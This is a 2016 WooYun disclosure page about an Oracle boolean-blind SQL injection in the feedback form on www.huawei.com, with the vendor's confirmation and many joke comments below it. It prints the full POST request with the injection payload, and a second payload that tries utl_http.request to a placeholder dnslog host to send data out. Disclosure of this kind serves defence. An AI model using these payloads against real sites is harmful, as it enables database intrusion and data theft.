当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169562

漏洞标题:www.huawei.com的一处Oracle注射

相关厂商:华为技术有限公司

漏洞作者: lijiejie

提交时间:2016-01-13 11:26

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

www.huawei.com的一处Oracle注射

详细说明:

注射点:

POST /en/FeedBack HTTP/1.1
Host: www.huawei.com
Proxy-Connection: keep-alive
Content-Length: 162
Accept: */*
Origin: http://www.huawei.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.huawei.com/en/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=hupzqkr5o122wrlvuiy3qkmo; SC_ANALYTICS_GLOBAL_COOKIE=4b50e7b82e9041ffb780b270e401e1d9; SC_ANALYTICS_SESSION_COOKIE=AF78D9A9A3BF4E04B76D2DDAE215CC63|1|hupzqkr5o122wrlvuiy3qkmo; tma=92496004.78018484.1452490478559.1452490478559.1452490478559.1; tmd=1.92496004.78018484.1452490478559.; bfdid=b0605254007bf9520001766f0003017956933e84; ttc=1452737528403; s_ppv=100; cbg1#lang=en; _ga=GA1.2.1081421593.1452490472; s_depth=2; s_cc=true; s_sq=huawei-corporate-prd%252Chuawei-global-prd%3D%2526pid%253Dwww.huawei.com%25252Fen%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.huawei.com%25252Fen%25252F%252523%2526ot%253DA; s_fid=4BA49EB0CEEE9013-296CA0231EB6D47F; s_visit=1
gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&email=test@test.com' or 1=1 and substr(user,1,9)='WWWEXTEND§1§'--%20&gongsi=admin&tel=111&liuyan=thank+you


每一个参数都可以注入。 Oracle bool blind.

漏洞证明:

先试试最基本的,逐字符猜解,得到user:

user:   WWWEXTEND


试过utl_inaddr.get_host_address将数据打回cloudeye,但是失败了。
也试了下utl_http.request,打不出来。

gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&email=test@test.com' or 1=1 and length((select utl_http.request('http://xxxxxxx.dnslog.info/1.txt') from dual))=1--%20&gongsi=admin&tel=111&liuyan=thank+you


可能Oracle DB Server不能上网,在内网中,隔离了。

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-15 16:49

厂商回复:

感谢lijiejie对华为公司安全的关注,我们已经相关部门整改该漏洞。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-13 11:28 | Aasron ( 普通白帽子 | Rank:215 漏洞数:59 | 工欲善其事,必先利其器)

    屠龙宝刀,点击就送

  2. 2016-01-13 11:29 | 孤独雪狼 认证白帽子 ( 普通白帽子 | Rank:714 漏洞数:146 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    屠龙宝刀,点击就送

  3. 2016-01-13 11:30 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1850 漏洞数:296 | 风暴网络安全空间:http://www.heysec.or...)

    屠龙宝刀,点击就送

  4. 2016-01-13 11:31 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2243 漏洞数:302 | 天天向上 !!!)

    姐姐霸气!

  5. 2016-01-13 11:34 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 外星人入侵地球,最先阻挡他们的应该是绕在...)

    屠龙宝刀,点击就送

  6. 2016-01-13 11:36 | 龍 、 ( 普通白帽子 | Rank:442 漏洞数:154 | 你若安好 我就是晴天)

    屠龙宝刀,点击就送

  7. 2016-01-13 11:38 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | Please speak in Chinese.)

    屠龙宝刀,点击就送

  8. 2016-01-13 11:40 | 404notfound ( 普通白帽子 | Rank:259 漏洞数:71 | 考研中,有事请留言)

    前排咳瓜子

  9. 2016-01-13 11:41 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这是个什么梗

  10. 2016-01-13 11:52 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖,不如相濡以沫)

    屠龙宝刀,点击不送

  11. 2016-01-13 11:56 | 一只猿 ( 普通白帽子 | Rank:509 漏洞数:92 | 硬件与无线通信研究方向)

    屠龙宝刀,点击不送

  12. 2016-01-13 12:04 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    6666

  13. 2016-01-13 12:13 | 深度安全实验室 ( 核心白帽子 | Rank:2695 漏洞数:454 )

    屠龙宝刀,点击就送

  14. 2016-01-13 12:26 | ’‘Nome ( 实习白帽子 | Rank:85 漏洞数:24 | 有事请发邮件,2859857@gmail.com,垃圾邮...)

    点击就送李劼杰经典帅照

  15. 2016-01-13 12:26 | 随风的风 ( 普通白帽子 | Rank:211 漏洞数:76 | 微信公众号:233sec 不定期分享各种漏洞思...)

    屠龙宝刀,点击就送

  16. 2016-01-13 12:27 | Submit ( 普通白帽子 | Rank:527 漏洞数:120 | )

    屠龙宝刀,点击就送

  17. 2016-01-13 12:39 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    屠龙宝刀是个什么梗。。

  18. 2016-01-13 12:59 | 小红猪 ( 普通白帽子 | Rank:285 漏洞数:54 | little red pig!)

    我艹,牛逼

  19. 2016-01-13 13:02 | YiYang ( 实习白帽子 | Rank:33 漏洞数:14 | 一锹、两锹、三锹。。。)

    神器么。。

  20. 2016-01-13 13:07 | 高小厨 认证白帽子 ( 普通白帽子 | Rank:904 漏洞数:82 | 不会吹牛的小二不是好厨子!)

    倚天神剑,点击就送

  21. 2016-01-13 13:11 | mantis ( 实习白帽子 | Rank:61 漏洞数:8 | 一萧一剑走江湖,千古情愁尿一壶)

    服了

  22. 2016-01-13 13:13 | poooooi ( 路人 | Rank:0 漏洞数:1 | 请叫我女王大人)

    pooi

  23. 2016-01-13 13:21 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:76 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    屠龙宝刀,点击就送

  24. 2016-01-13 13:41 | 华不再扬 ( 实习白帽子 | Rank:39 漏洞数:7 | 热爱安全。)

    屠龙宝刀,点击就送

  25. 2016-01-13 14:08 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    华为主站啊

  26. 2016-01-13 14:25 | 泪雨无魂 ( 普通白帽子 | Rank:229 漏洞数:57 )

    屠龙宝刀,点击就送

  27. 2016-01-13 14:26 | 诚殷的小白帽 ( 实习白帽子 | Rank:44 漏洞数:26 )

    屠龙宝刀,点击就送

  28. 2016-01-13 14:27 | fakeidentity ( 路人 | Rank:19 漏洞数:7 | 既然给了我天空,那还束缚我干吗)

    屠龙宝刀,点击就送

  29. 2016-01-13 15:31 | 大亮 ( 普通白帽子 | Rank:333 漏洞数:67 | 慢慢挖洞)

    为什么没有(附验证脚本)

  30. 2016-01-13 19:02 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    独特属性 由你打造 单挑BOSS 怒刷装备 皇城PK 胜者为王 屠龙宝刀 点击就送 极品装备 一秒刷爆 幸运抽奖 惊喜不断 经典装备 极品属性 神秘宝箱 开箱有喜 无限刷怪 双倍经验 我不断的寻找 有你的世界在哪里

  31. 2016-01-13 19:37 | Fire ant ( 实习白帽子 | Rank:97 漏洞数:32 | 他们回来了................)

    我是林志玲 我在天书世界等你

  32. 2016-01-13 19:47 | kav ( 路人 | Rank:16 漏洞数:8 )

    屠龙宝刀,点击就送

  33. 2016-01-13 20:07 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    屠龙宝刀,点击就送

  34. 2016-01-13 21:03 | 晓贤 ( 路人 | Rank:2 漏洞数:1 | 用心做好每件有意义的事)

    网络连接错误(错误代码:102)

  35. 2016-01-13 21:23 | 从容 ( 普通白帽子 | Rank:252 漏洞数:80 | Enjoy Hacking Just Because It's Fun | ...)

    屠龙宝刀,点击就送

  36. 2016-01-13 22:32 | boger ( 路人 | Rank:4 漏洞数:2 | 任重而道远)

    屠龙宝刀,点击就送

  37. 2016-01-13 22:45 | 带我玩 ( 路人 | Rank:14 漏洞数:7 | 带我玩)

    屠龙宝刀,点击就送

  38. 2016-01-14 09:26 | Jumbo ( 普通白帽子 | Rank:115 漏洞数:30 | 猫 - http://www.chinabaiker.com)

    屠龙宝刀,点击就送

  39. 2016-01-17 19:40 | vaf ( 路人 | Rank:6 漏洞数:2 | 不是网安专业的死屌丝)

    屠龙宝刀,点击就送

  40. 2016-03-01 14:55 | me1ody ( 普通白帽子 | Rank:117 漏洞数:33 | 乌云临时工)

    屠龙宝刀,点击就送

  41. 2016-03-02 19:32 | 屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)

    你们这是要闹哪样???

  42. 2016-03-03 07:24 | Fire ant ( 实习白帽子 | Rank:97 漏洞数:32 | 他们回来了................)

    @屠龙宝刀点击就送 楼上超神了